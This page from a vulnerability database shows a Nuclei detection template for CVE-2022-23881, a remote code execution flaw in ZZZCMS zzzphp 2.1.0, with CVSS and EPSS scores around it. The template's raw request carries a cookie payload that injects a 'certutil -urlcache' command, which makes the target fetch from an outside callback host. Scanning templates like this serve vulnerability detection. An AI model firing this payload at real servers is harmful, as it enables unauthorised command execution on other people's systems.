Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-23881
HistoryMar 29, 2022 - 11:41 p.m.

ZZZCMS zzzphp 2.1.0 - Remote Code Execution

2022-03-2923:41:01
ProjectDiscovery
github.com
17

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.6 High

AI Score

Confidence

High

0.166 Low

EPSS

Percentile

96.1%

ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.

id: CVE-2022-23881

info:
  name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp.
  reference:
    - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md
    - http://www.zzzcms.com
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23881
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-23881
    cwe-id: CWE-77
    epss-score: 0.16723
    epss-percentile: 0.95904
    cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2022,rce,zzzphp,zzzcms

http:
  - raw:
      - |
        GET /?location=search HTTP/1.1
        Host: {{Hostname}}
        Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 500
# digest: 490a0046304402206e4532e227dccab23d15511e741d5332c04c553aec092af6b3f824278ebd18c9022064325bd4ae46cc3b31537d917d6159428ee7cfe953375bb53aac8c2024b8ae2d:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.6 High

AI Score

Confidence

High

0.166 Low

EPSS

Percentile

96.1%

Related for NUCLEI:CVE-2022-23881